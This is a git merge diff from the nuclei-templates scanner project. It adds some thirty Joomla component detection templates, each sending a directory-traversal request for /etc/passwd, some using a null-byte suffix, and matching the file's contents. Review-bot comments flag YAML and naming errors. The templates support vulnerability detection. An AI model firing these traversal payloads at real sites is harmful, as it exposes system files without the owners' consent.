Merge branch 'master' of https://github.com/projectdiscovery/nuclei-templates into CVE-2021-1497

patch-1
sandeep 2021-10-02 05:18:04 +05:30
commit aec246bf5b
118 changed files with 18632 additions and 904 deletions


@ -1,9 +1,6 @@
name: 🗒 Templates Stats
on:
create:
tags:
- v*
workflow_dispatch:
jobs:


@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags,
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
| cve | 725 | pikpikcu | 273 | cves | 725 | info | 643 | http | 1965 |
| lfi | 260 | dhiyaneshdk | 258 | vulnerabilities | 301 | high | 553 | file | 46 |
| panel | 248 | daffainfo | 213 | exposed-panels | 247 | medium | 448 | network | 41 |
| xss | 244 | pdteam | 195 | technologies | 191 | critical | 273 | dns | 12 |
| exposure | 231 | geeknik | 152 | exposures | 188 | low | 152 | | |
| wordpress | 223 | dwisiswant0 | 131 | misconfiguration | 136 | | | | |
| rce | 198 | gy741 | 72 | takeovers | 64 | | | | |
| tech | 181 | pussycat0x | 67 | default-logins | 56 | | | | |
| cve2020 | 164 | madrobot | 61 | file | 46 | | | | |
| wp-plugin | 149 | princechaddha | 61 | workflows | 36 | | | | |
| cve | 804 | daffainfo | 280 | cves | 804 | info | 661 | http | 2068 |
| lfi | 325 | pikpikcu | 277 | vulnerabilities | 311 | high | 621 | file | 46 |
| xss | 253 | dhiyaneshdk | 268 | exposed-panels | 250 | medium | 463 | network | 43 |
| panel | 252 | pdteam | 199 | technologies | 200 | critical | 275 | dns | 12 |
| wordpress | 241 | geeknik | 154 | exposures | 188 | low | 154 | | |
| exposure | 233 | dwisiswant0 | 131 | misconfiguration | 136 | | | | |
| rce | 200 | gy741 | 77 | takeovers | 64 | | | | |
| tech | 191 | pussycat0x | 70 | default-logins | 56 | | | | |
| wp-plugin | 167 | princechaddha | 63 | file | 46 | | | | |
| cve2020 | 164 | madrobot | 61 | workflows | 37 | | | | |
**166 directories, 2144 files**.
**166 directories, 2231 files**.
</td>
</tr>


@ -1,12 +1,12 @@
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
| cve | 739 | pikpikcu | 273 | cves | 739 | info | 650 | http | 1991 |
| lfi | 266 | dhiyaneshdk | 268 | vulnerabilities | 307 | high | 560 | file | 46 |
| panel | 252 | daffainfo | 217 | exposed-panels | 250 | medium | 456 | network | 42 |
| xss | 248 | pdteam | 195 | technologies | 192 | critical | 276 | dns | 12 |
| wordpress | 235 | geeknik | 154 | exposures | 188 | low | 154 | | |
| cve | 804 | daffainfo | 280 | cves | 804 | info | 661 | http | 2068 |
| lfi | 325 | pikpikcu | 277 | vulnerabilities | 311 | high | 621 | file | 46 |
| xss | 253 | dhiyaneshdk | 268 | exposed-panels | 250 | medium | 463 | network | 43 |
| panel | 252 | pdteam | 199 | technologies | 200 | critical | 275 | dns | 12 |
| wordpress | 241 | geeknik | 154 | exposures | 188 | low | 154 | | |
| exposure | 233 | dwisiswant0 | 131 | misconfiguration | 136 | | | | |
| rce | 200 | gy741 | 76 | takeovers | 64 | | | | |
| tech | 183 | pussycat0x | 69 | default-logins | 56 | | | | |
| cve2020 | 164 | princechaddha | 61 | file | 46 | | | | |
| wp-plugin | 161 | madrobot | 61 | workflows | 37 | | | | |
| rce | 200 | gy741 | 77 | takeovers | 64 | | | | |
| tech | 191 | pussycat0x | 70 | default-logins | 56 | | | | |
| wp-plugin | 167 | princechaddha | 63 | file | 46 | | | | |
| cve2020 | 164 | madrobot | 61 | workflows | 37 | | | | |


@ -1,14 +1,19 @@
id: deprecated-sshv1-detection
id: CVE-2001-1473
info:
name: Deprecated SSHv1 Protocol Detection
author: iamthefrogy
severity: medium
tags: network,ssh,openssh
severity: high
tags: network,ssh,openssh,cves,cves2001
description: SSHv1 is deprecated and has known cryptographic issues.
reference:
- https://www.kb.cert.org/vuls/id/684820
- https://nvd.nist.gov/vuln/detail/CVE-2001-1473
classification:
cvss-score: 7.4
cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N
cve-id: CVE-2001-1473
cwe-id: CWE-310
network:
- host:
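Review bot: the new tags on the `tags:` line, `cves,cves2001`, do not follow the `cve,cve<year>` convention used by every other CVE template in this commit (e.g. `tags: cve,cve2007,joomla,lfi`); use `cve,cve2001` so this template is picked up by the same tag filters. The `description:` line was left unchanged and still does not mention CVE-2001-1473 even though the `id` now is the CVE; a short mention of the CVE and of the `cvss-score: 7.4` basis for the medium to high severity bump would make the rename self-explanatory.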


@ -0,0 +1,27 @@
id: CVE-2007-4504
info:
name: Joomla! Component RSfiles 1.0.2 - 'path' File Download
author: daffainfo
severity: high
description: Directory traversal vulnerability in index.php in the RSfiles component (com_rsfiles) 1.0.2 and earlier for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the path parameter in a files.display action.
reference:
- https://www.exploit-db.com/exploits/4307
- https://www.cvedetails.com/cve/CVE-2007-4504
tags: cve,cve2007,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_rsfiles&task=files.display&path=../../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200
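Review bot: the template sets `severity: high` but has no `classification:` block, so the severity has no recorded CVSS basis; the other templates in this commit that carry a CVE (CVE-2010-0467, CVE-2010-1870) include `cvss-score`, `cvss-metrics`, `cve-id` and `cwe-id`, and the same block (with `cwe-id: CWE-22` for a directory traversal) belongs here and in the other new Joomla templates that share this layout. The reference list also cites cvedetails where the CVE-2001-1473 hunk above links the NVD entry; one consistent source is preferable.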


@ -0,0 +1,27 @@
id: CVE-2008-6080
info:
name: Joomla! Component ionFiles 4.4.2 - File Disclosure
author: daffainfo
severity: high
description: Directory traversal vulnerability in download.php in the ionFiles (com_ionfiles) 4.4.2 component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.
reference:
- https://www.exploit-db.com/exploits/6809
- https://www.cvedetails.com/cve/CVE-2008-6080
tags: cve,cve2008,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/components/com_ionfiles/download.php?file=../../../../../../../../etc/passwd&download=1"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200


@ -0,0 +1,27 @@
id: CVE-2008-6222
info:
name: Joomla! Component ProDesk 1.0/1.2 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Pro Desk Support Center (com_pro_desk) component 1.0 and 1.2 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the include_file parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/6980
- https://www.cvedetails.com/cve/CVE-2008-6222
tags: cve,cve2008,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_pro_desk&include_file=../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200


@ -0,0 +1,27 @@
id: CVE-2009-1496
info:
name: Joomla! Component Cmimarketplace - 'viewit' Directory Traversal
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Cmi Marketplace (com_cmimarketplace) component 0.1 for Joomla! allows remote attackers to list arbitrary directories via a .. (dot dot) in the viewit parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/8367
- https://www.cvedetails.com/cve/CVE-2009-1496
tags: cve,cve2009,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_cmimarketplace&Itemid=70&viewit=/../../../../../../etc/passwd&cid=1"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200
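Review bot: the description says the flaw lets a remote attacker "list arbitrary directories" via `viewit`, but the matcher `root:.*:0:0` only fires if the response contains the body of /etc/passwd; a directory-listing bug returns a listing, not file contents, so as written the template may never match and silently report nothing. Verify against the exploit-db reference (8367) whether the response carries file contents; if it does not, the matcher needs to be changed to what the component actually returns, and if it does, the description should say "read arbitrary files".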


@ -0,0 +1,27 @@
id: CVE-2009-2015
info:
name: Joomla! Component MooFAQ (com_moofaq) - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in includes/file_includer.php in the Ideal MooFAQ (com_moofaq) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.
reference:
- https://www.exploit-db.com/exploits/8898
- https://www.cvedetails.com/cve/CVE-2009-2015
tags: cve,cve2009,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/components/com_moofaq/includes/file_includer.php?gzip=0&file=/../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200


@ -0,0 +1,27 @@
id: CVE-2009-2100
info:
name: Joomla! Component com_Projectfork 2.0.10 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the JoomlaPraise Projectfork (com_projectfork) component 2.0.10 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the section parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/8946
- https://www.cvedetails.com/cve/CVE-2009-2100
tags: cve,cve2009,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_projectfork&section=../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200


@ -0,0 +1,27 @@
id: CVE-2009-3053
info:
name: Joomla! Component Agora 3.0.0b (com_agora) - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Agora (com_agora) component 3.0.0b for Joomla! allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the action parameter to the avatars page, reachable through index.php.
reference:
- https://www.exploit-db.com/exploits/9564
- https://www.cvedetails.com/cve/CVE-2009-3053
tags: cve,cve2009,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200


@ -0,0 +1,27 @@
id: CVE-2009-3318
info:
name: Joomla! Component com_album 1.14 - Directory Traversal
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Roland Breedveld Album (com_album) component 1.14 for Joomla! allows remote attackers to access arbitrary directories and have unspecified other impact via a .. (dot dot) in the target parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/9706
- https://www.cvedetails.com/cve/CVE-2009-3318
tags: cve,cve2009,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_album&Itemid=128&target=../../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200
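Review bot: the description speaks of accessing "arbitrary directories" with "unspecified other impact", while the matcher requires `root:.*:0:0`, i.e. the contents of /etc/passwd, in a 200 response. If the `target` parameter only yields directory access, this regex will not match and the template produces false negatives; confirm against the exploit-db entry (9706) that file contents are returned, or adjust the matcher and description to agree.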


@ -0,0 +1,27 @@
id: CVE-2009-4202
info:
name: Joomla! Component Omilen Photo Gallery 0.5b - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Omilen Photo Gallery (com_omphotogallery) component Beta 0.5 for Joomla! allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/8870
- https://www.cvedetails.com/cve/CVE-2009-4202
tags: cve,cve2009,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_omphotogallery&controller=../../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200


@ -0,0 +1,27 @@
id: CVE-2009-4679
info:
name: Joomla! Component iF Portfolio Nexus - 'Controller' Remote File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the inertialFATE iF Portfolio Nexus (com_if_nexus) component 1.5 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
reference: |
- https://www.exploit-db.com/exploits/33440
- https://www.cvedetails.com/cve/CVE-2009-4679
tags: cve,cve2009,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_kif_nexus&controller=../../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200
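Review bot: three problems in this hunk. `reference: |` makes the two lines beneath it one literal string instead of a YAML sequence, so the references will not be parsed as a list; drop the `|` and use the plain `reference:` / `- https://...` form the other templates use. The request uses `option=com_kif_nexus` while the description names the component `com_if_nexus`; check which option value the exploit-db entry (33440) actually uses, since a wrong option name means the component is never reached. Finally, the `name:` says "Remote File Inclusion" but the description, the `lfi` tag and the /etc/passwd matcher all describe local file inclusion; make the name match.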


@ -0,0 +1,27 @@
id: CVE-2010-0157
info:
name: Joomla! Component com_biblestudy - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Bible Study (com_biblestudy) component 6.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter in a studieslist action to index.php.
reference:
- https://www.exploit-db.com/exploits/10943
- https://www.cvedetails.com/cve/CVE-2010-0157
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_biblestudy&id=1&view=studieslist&controller=../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200


@ -0,0 +1,32 @@
id: CVE-2010-0467
info:
name: Joomla! Component CCNewsLetter - Local File Inclusion
author: daffainfo
severity: medium
description: Directory traversal vulnerability in the ccNewsletter (com_ccnewsletter) component 1.0.5 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter in a ccnewsletter action to index.php.
reference: |
- https://www.exploit-db.com/exploits/11282
- https://www.cvedetails.com/cve/CVE-2010-0467
tags: cve,cve2010,joomla,lfi
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N
cvss-score: 5.80
cve-id: CVE-2010-0467
cwe-id: CWE-22
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_ccnewsletter&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200
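Review bot: `reference: |` turns the reference URLs into a single literal string rather than a YAML list; remove the `|`. `cvss-score: 5.80` should be `5.8` to match the form used in the other classification blocks (`cvss-score: 7.4`, `cvss-score: 5.0`). Apart from that, this is the only new Joomla template in the commit with a `classification:` block (`cvss-metrics`, `cve-id`, `cwe-id: CWE-22`), which is the shape the rest should follow.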


@ -0,0 +1,27 @@
id: CVE-2010-0696
info:
name: Joomla! Component Jw_allVideos - Arbitrary File Download
author: daffainfo
severity: high
description: Directory traversal vulnerability in includes/download.php in the JoomlaWorks AllVideos (Jw_allVideos) plugin 3.0 through 3.2 for Joomla! allows remote attackers to read arbitrary files via a ./../.../ (modified dot dot) in the file parameter.
reference:
- https://www.exploit-db.com/exploits/11447
- https://www.cvedetails.com/cve/CVE-2010-0696
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/plugins/content/jw_allvideos/includes/download.php?file=../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200


@ -0,0 +1,27 @@
id: CVE-2010-0759
info:
name: Joomla! Plugin Core Design Scriptegrator - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php in the Core Design Scriptegrator plugin 1.4.1 for Joomla! allows remote attackers to read, and possibly include and execute, arbitrary files via directory traversal sequences in the files[] parameter.
reference:
- https://www.exploit-db.com/exploits/11498
- https://www.cvedetails.com/cve/CVE-2010-0759
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files[]=/etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200


@ -0,0 +1,27 @@
id: CVE-2010-0942
info:
name: Joomla! Component com_jvideodirect - Directory Traversal
author: daffainfo
severity: high
description: Directory traversal vulnerability in the jVideoDirect (com_jvideodirect) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/11089
- https://www.cvedetails.com/cve/CVE-2010-0942
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_jvideodirect&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200


@ -0,0 +1,27 @@
id: CVE-2010-0972
info:
name: Joomla! Component com_gcalendar Suite 2.1.5 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the GCalendar (com_gcalendar) component 2.1.5 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/11738
- https://www.cvedetails.com/cve/CVE-2010-0972
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_gcalendar&controller=../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200


@ -0,0 +1,27 @@
id: CVE-2010-0982
info:
name: Joomla! Component com_cartweberp - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the CARTwebERP (com_cartweberp) component 1.56.75 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/10942
- https://www.cvedetails.com/cve/CVE-2010-0982
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_cartweberp&controller=../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200


@ -0,0 +1,27 @@
id: CVE-2010-1056
info:
name: Joomla! Component com_rokdownloads - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the RokDownloads (com_rokdownloads) component before 1.0.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/11760
- https://www.cvedetails.com/cve/CVE-2010-1056
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_rokdownloads&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200


@ -0,0 +1,27 @@
id: CVE-2010-1081
info:
name: Joomla! Component com_communitypolls 1.5.2 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Community Polls (com_communitypolls) component 1.5.2, and possibly earlier, for Core Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/11511
- https://www.cvedetails.com/cve/CVE-2010-1081
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_communitypolls&controller=../../../../../../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200


@ -0,0 +1,27 @@
id: CVE-2010-1217
info:
name: Joomla! Component & Plugin JE Tooltip 1.0 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the JE Form Creator (com_jeformcr) component for Joomla!, when magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via directory traversal sequences in the view parameter to index.php. NOTE the original researcher states that the affected product is JE Tooltip, not Form Creator; however, the exploit URL suggests that Form Creator is affected.
reference:
- https://www.exploit-db.com/exploits/11814
- https://www.cvedetails.com/cve/CVE-2010-1217
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_jeformcr&view=../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200
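Review bot: the `name:` says "JE Tooltip 1.0" but the request targets `option=com_jeformcr` (JE Form Creator), and the description itself records that disagreement; name the template after the component the request actually exercises, or mention both products in the name, so users filtering by product name find it. A `classification:` block with the CVE and CWE-22 would also help here, as noted for the other new Joomla templates.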


@ -0,0 +1,27 @@
id: CVE-2010-1302
info:
name: Joomla! Component DW Graph - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in dwgraphs.php in the DecryptWeb DW Graphs (com_dwgraphs) component 1.0 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/11978
- https://www.cvedetails.com/cve/CVE-2010-1302
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_dwgraphs&controller=../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200


@ -0,0 +1,27 @@
id: CVE-2010-1340
info:
name: Joomla! Component com_jresearch - 'Controller' Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in jresearch.php in the J!Research (com_jresearch) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/33797
- https://www.cvedetails.com/cve/CVE-2010-1340
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_jresearch&controller=../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200


@ -0,0 +1,27 @@
id: CVE-2010-1461
info:
name: Joomla! Component Photo Battle 1.0.1 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Photo Battle (com_photobattle) component 1.0.1 for Joomla! allows remote attackers to read arbitrary files via the view parameter to index.php.
reference: |
- https://www.exploit-db.com/exploits/12232
- https://www.cvedetails.com/cve/CVE-2010-1461
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_photobattle&view=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200
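Review bot: `reference: |` makes the two URLs a literal block string rather than a YAML list; remove the `|` so the key matches the `reference:` / `- https://...` form used by CVE-2010-1491 and the other templates in this commit.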


@ -0,0 +1,27 @@
id: CVE-2010-1469
info:
name: Joomla! Component JProject Manager 1.0 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Ternaria Informatica JProject Manager (com_jprojectmanager) component 1.0 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
reference: |
- https://www.exploit-db.com/exploits/12146
- https://www.cvedetails.com/cve/CVE-2010-1469
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_jprojectmanager&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200
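Review bot: same `reference: |` defect as in the Photo Battle template above; the `|` turns the reference list into one literal string and should be removed.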


@ -0,0 +1,27 @@
id: CVE-2010-1478
info:
name: Joomla! Component Jfeedback 1.2 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Ternaria Informatica Jfeedback! (com_jfeedback) component 1.2 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
reference: |
- https://www.exploit-db.com/exploits/12145
- https://www.cvedetails.com/cve/CVE-2010-1478
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_jfeedback&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200
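Review bot: `reference: |` again makes the URLs a literal string instead of a list; drop the `|`. This template and CVE-2010-1469 directly above are otherwise identical apart from the component name, which is expected for two Ternaria Informatica components with the same flaw.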


@ -0,0 +1,27 @@
id: CVE-2010-1491
info:
name: Joomla! Component MMS Blog 2.3.0 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the MMS Blog (com_mmsblog) component 2.3.0 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12318
- https://www.cvedetails.com/cve/CVE-2010-1491
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_mmsblog&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200


@ -0,0 +1,27 @@
id: CVE-2010-1540
info:
name: Joomla! Component com_blog - Directory Traversal
author: daffainfo
severity: high
description: Directory traversal vulnerability in index.php in the MyBlog (com_myblog) component 3.0.329 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the task parameter.
reference: |
- https://www.exploit-db.com/exploits/11625
- https://www.cvedetails.com/cve/CVE-2010-1540
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_myblog&Itemid=1&task=../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200
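Review bot: the `name:` says `com_blog`, but the description and the request both refer to the MyBlog component `com_myblog`; rename to "Joomla! Component com_myblog - Directory Traversal" so the name identifies the right component. `reference: |` also needs the `|` removed so the URLs parse as a YAML list.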


@ -0,0 +1,27 @@
id: CVE-2010-1603
info:
name: Joomla! Component ZiMBCore 0.1 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the ZiMB Core (aka ZiMBCore or com_zimbcore) component 0.1 in the ZiMB Manager collection for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12284
- https://www.cvedetails.com/cve/CVE-2010-1603
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_zimbcore&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200


@ -0,0 +1,27 @@
id: CVE-2010-1653
info:
name: Joomla! Component Graphics 1.0.6 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in graphics.php in the Graphics (com_graphics) component 1.0.6 and 1.5.0 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. NOTE some of these details are obtained from third party information.
reference:
- https://www.exploit-db.com/exploits/12430
- https://www.cvedetails.com/cve/CVE-2010-1653
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_graphics&controller=../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200


@ -0,0 +1,27 @@
id: CVE-2010-1658
info:
name: Joomla! Component NoticeBoard 1.3 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Code-Garage NoticeBoard (com_noticeboard) component 1.3 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12427
- https://www.cvedetails.com/cve/CVE-2010-1658
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_noticeboard&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200


@ -0,0 +1,27 @@
id: CVE-2010-1715
info:
name: Joomla! Component Online Exam 1.5.0 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Online Examination (aka Online Exam or com_onlineexam) component 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. NOTE some of these details are obtained from third party information.
reference:
- https://www.exploit-db.com/exploits/12174
- https://www.cvedetails.com/cve/CVE-2010-1715
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_onlineexam&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200


@ -1,14 +1,19 @@
id: maestro-unauth-rce
id: CVE-2010-1870
info:
name: ListSERV Maestro <= 9.0-8 RCE
author: b0yd
severity: info
description: CVE-2010-1870 Struts based OGNL remote code execution in ListSERV Maestro before and including version 9.0-8.
description: Struts-based OGNL remote code execution in ListSERV Maestro before and including version 9.0-8.
reference:
- https://www.securifera.com/advisories/sec-2020-0001/
- https://packetstormsecurity.com/files/159643/listservmaestro-exec.txt
tags: rce,listserv,ognl
tags: rce,listserv,ognl,cves,cve2010
classification:
cvss-metrics: AV:N/AC:L/Au:N/C:N/I:P/A:N
cvss-score: 5.0
cve-id: CVE-2010-1870
cwe-id: CWE-917
requests:
- method: GET
